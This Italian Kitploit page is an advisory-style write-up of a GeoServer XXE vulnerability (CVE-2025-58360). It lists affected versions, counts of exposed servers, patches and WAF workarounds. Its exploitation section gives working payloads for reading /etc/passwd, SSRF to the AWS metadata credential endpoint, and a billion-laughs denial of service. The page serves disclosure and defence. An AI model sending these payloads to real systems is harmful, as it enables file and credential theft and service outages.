Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Strumenti/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniSicurezza WebPenetration Testing
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
8 mesi faNon ancora revisionato

🔓 🛰️ 'CVE-2025-58360' Endpoint WMS di GeoServer Vulnerabile ad Attacco XXE 🌟

GeoServer

🏷️ Informazioni di Base

  • CVE ID: CVE-2025-58360
  • Pubblicato: 📅 25 Novembre 2025
  • Ultima Modifica: 📅 25 Novembre 2025 (ancora fresco al 26 Nov)
  • Tipo di Vulnerabilità: XML External Entity (XXE) – CWE-611
  • Software Affetto: GeoServer (server geospaziale open-source scritto in Java)
  • Gravità: 🔥 Alta – Punteggio Base CVSS v3.1 7.5
    • Vettore: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Sfruttamento in Natura: 🟡 Non ancora osservato (26 Nov 2025) – ma PoC pubblici stanno circolando
  • Autenticazione Richiesta: ❌ Nessuna – completamente non autenticato
  • Interazione Utente Richiesta: ❌ Nessuna

🎨 Cosa Rende Questo Bug Speciale (e Pericoloso)

Questo è un XXE classico ma devastante nell'endpoint GetMap del Web Map Service (WMS).
Gli attaccanti possono:

  • 📂 Leggere qualsiasi file a cui il processo GeoServer ha accesso (/etc/passwd, geoserver.xml, chiavi private, ecc.)
  • 🌐 Effettuare Server-Side Request Forgery (SSRF) per scansionare reti interne o colpire endpoint di metadati (es. AWS/GCP)
  • 💣 Innescare Denial-of-Service con attacchi di espansione entità (“billion laughs”)
  • 🔗 Potenzialmente combinare con altre vulnerabilità per RCE completo (non diretto, ma possibile in configurazioni errate)

🛡️ Versioni Affette (Tabella Dettagliata)

🌍 Esposizione Globale (In tempo reale al 26 Nov 2025)

→ Sono decine di migliaia di server potenzialmente vulnerabili esposti su Internet aperto in questo momento! 🌐

🧨 Guida Completa allo Sfruttamento Tecnico

Endpoint: POST /geoserver/wms
Parametro Chiave: SLD_BODY (permette stile XML grezzo)
Percorso del Codice Vulnerabile: Il parser XML non disabilita la risoluzione di entità esterne → XXE classico.

f77f64d7c92fd31b29d537f5205da524

Esempio 1 – Divulgazione File (/etc/passwd)

root@kitploit:~
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
  <sld:UserLayer>
    <sld:LayerFeatureConstraints>
      <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
    </sld:LayerFeatureConstraints>
  </sld:UserLayer>
</sld:StyledLayerDescriptor>

→ La risposta contiene il contenuto di /etc/passwd 🎉

Esempio 2 – SSRF verso Metadati Interni (esempio AWS)

root@kitploit:~
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

→ Perde credenziali AWS temporanee se in esecuzione su EC2.

Esempio 3 – DoS Billion Laughs

root@kitploit:~
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!-- ripeti fino a lol9 -->
]>
<lol>&lol9;</lol>

→ Consuma gigabyte di RAM in secondi 💥

🛠️ Patch Ufficiali e Download

VersioneData di RilascioLink Download
2.27.025 Nov 2025https://geoserver.org/release/stable/

Utenti Docker:

root@kitploit:~
docker pull osgeo/geoserver:2.27.0

🔧 Soluzioni Alternative (se non puoi patchare immediatamente)

  1. Bloccare XML pericoloso con regola WAF/mod_security:
    Negare richieste contenenti <!ENTITY o SYSTEM "file://
  2. Disabilitare il parametro SLD_BODY globalmente (se non necessario)
  3. Eseguire GeoServer con filesystem in sola lettura + rimuovere capacità
  4. Mettere dietro un reverse proxy che rimuove i corpi XML per utenti non autenticati

📢 Riferimenti Ufficiali e PoC

  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
  • GeoServer Advisory: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
  • JIRA Ticket: https://osgeo-org.atlassian.net/browse/GEOS-11682
  • Public Safe PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
  • Template Nuclei (auto-rilevamento): Già integrato nel ramo principale

⏰ Cronologia

DataEvento
Prima di Nov 2025Scoperto autonomamente dallo scanner AI XBOW
25 Nov 2025Divulgazione coordinata → patch rilasciate
25 Nov 2025CVE assegnato e pubblicato
26 Nov 2025PoC diventano virali, scansioni di esposizione aumentano

✨ Parole Finali

Questo è un XXE da manuale che colpisce una piattaforma geospaziale ampiamente distribuita con decine di migliaia di istanze esposte su Internet.
Patch rilasciate lo stesso giorno della divulgazione — grandi complimenti al team di GeoServer per la velocità! 🏆
Ma la finestra tra disponibilità delle patch e sfruttamento di massa si sta restringendo rapidamente.

Se gestisci GeoServer → aggiorna oggi.
Non diventare la prossima notizia.

Rimani sicuro, rimani splendente! 🛡️✨

Scarica lo strumento
ComponenteVersioni VulnerabiliCorretto InStato
GeoServer Standalone2.26.0 – 2.26.1
≤ 2.25.5
2.26.3, 2.25.6, 2.27.0🔴 Vulnerabile
Docker (osgeo/geoserver)2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.27.0🔴 Vulnerabile
Maven org.geoserver:gs-wms2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Vulnerabile
Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
≤ 2.25.5
2.26.2+, 2.25.6🔴 Vulnerabile
GeoServer 2.27.x e successive–Già patchato✅ Sicuro
FonteIstanze EsposteNote
ZoomEye~49.400app:"GeoServer" ricerca
FOFA~24.000Risultati dell'ultimo anno
Shodan~31.000Porta 8080 + corrispondenza titolo
GobySec~20.000Scansione rete pubblica
2.26.325 Nov 2025Patch ramo manutenzione
2.25.625 Nov 2025Ramo supportato più vecchio